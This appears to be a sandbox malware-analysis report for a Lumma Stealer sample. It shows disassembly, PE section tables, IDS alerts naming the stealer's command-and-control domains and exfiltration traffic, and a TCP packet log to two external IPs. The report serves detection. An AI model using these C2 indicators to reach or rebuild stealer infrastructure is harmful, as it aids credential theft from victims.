                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [edx], ah
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add al, byte ptr [ecx]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                                                                                  add dword ptr [eax], eax
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax+eax], ah
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                  0x10000x510000x248006707eae06ad8ef695694477125f4da28False0.9973980629280822data7.980219456440776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  0x540000x2ab0000x200e5b95ff924726a140bc506883f50bc2aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  mimqpfga0x2ff0000x1a40000x1a32004b75770d3c73a3ebf338defa94ed8d23False0.9946124506039368data7.95348924063239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  grnkiruz0x4a30000x10000x400b8557a71f048899a7fb693785871f879False0.7744140625data5.998764758216804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .taggant0x4a40000x30000x2200aea16088865b0798c279dd12307af37dFalse0.0861672794117647DOS executable (COM)0.933109508865922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                  RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                  kernel32.dlllstrcpy
                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                  2024-12-23T07:18:39.971144+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.8561521.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:40.115629+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.8592761.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:40.337317+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.8620611.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:40.479723+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.8595701.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:40.622145+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.8495001.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:40.855062+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.8600101.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:40.998287+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.8650501.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:41.223179+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.8576271.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:41.363940+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.8618581.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:43.081330+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84970423.55.153.106443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:43.856230+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84970423.55.153.106443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:45.487204+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:46.235451+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849705104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:46.235451+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:47.484626+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:48.533135+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849706104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:48.533135+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:50.240976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:52.321059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:54.904598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:57.514355+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:18:58.302029+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849713104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:19:00.687761+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:19:03.935119+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715104.21.66.86443TCP
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.652776003 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.652821064 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.652920961 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.656730890 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.656744957 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.081233025 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.081330061 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.085858107 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.085874081 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.086136103 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.138058901 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.159718990 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.207329035 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856151104 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856177092 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856184959 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856220007 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856230021 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856436014 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856462955 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:43.856524944 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.033835888 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.033890009 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.033917904 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.033942938 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.033993959 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064676046 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064752102 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064786911 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064809084 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064858913 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064904928 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.064959049 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.067421913 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.067435980 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.067519903 CET49704443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.067524910 CET4434970423.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.266474009 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.266535997 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.266660929 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.267119884 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.267138004 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.487121105 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.487204075 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.495057106 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.495076895 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.495652914 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.538031101 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.538069010 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.538244963 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235445976 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235578060 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235641003 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235929012 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235950947 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235972881 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235980988 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269506931 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269562960 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269670010 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269989967 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.270004988 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.484508991 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.484626055 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.486140966 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.486152887 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.486474037 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.487701893 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.487752914 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.487795115 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533174992 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533354998 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533422947 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533449888 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533528090 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533571005 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533576012 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533735037 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533782005 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533787012 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.541098118 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.541165113 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.541174889 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.549415112 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.549463987 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.549470901 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.591218948 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.591233969 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.640079975 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.652446032 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.707989931 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.724873066 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728755951 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728838921 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728867054 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728993893 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.729057074 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737323046 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737360001 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737370968 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737376928 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.020617008 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.020658970 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.020723104 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.021357059 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.021373987 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.240864038 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.240976095 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.242630959 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.242640018 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.243446112 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.245199919 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.245362043 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.245398998 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985196114 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985476971 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985558033 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985652924 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985666990 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.105545998 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.105585098 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.105655909 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.106030941 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.106045961 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.320871115 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.321058989 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.322748899 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.322758913 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.323163033 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.324721098 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.324923038 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.324978113 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.325041056 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:52.367371082 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.151989937 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.152304888 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.152368069 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.158466101 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.158502102 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.692662954 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.692698002 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.692795992 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.693154097 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:53.693164110 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.904139996 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.904597998 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.905721903 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.905728102 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.905955076 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.907241106 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.907407045 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.907423973 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.907480955 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:54.907486916 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:55.877582073 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:55.877681017 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:55.877756119 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:55.878052950 CET49710443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:55.878068924 CET44349710104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:56.302262068 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:56.302318096 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:56.302453041 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:56.302845001 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:56.302866936 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.514264107 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.514354944 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.515924931 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.515933037 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.516163111 CET44349713104.21.66.86192.168.2.8
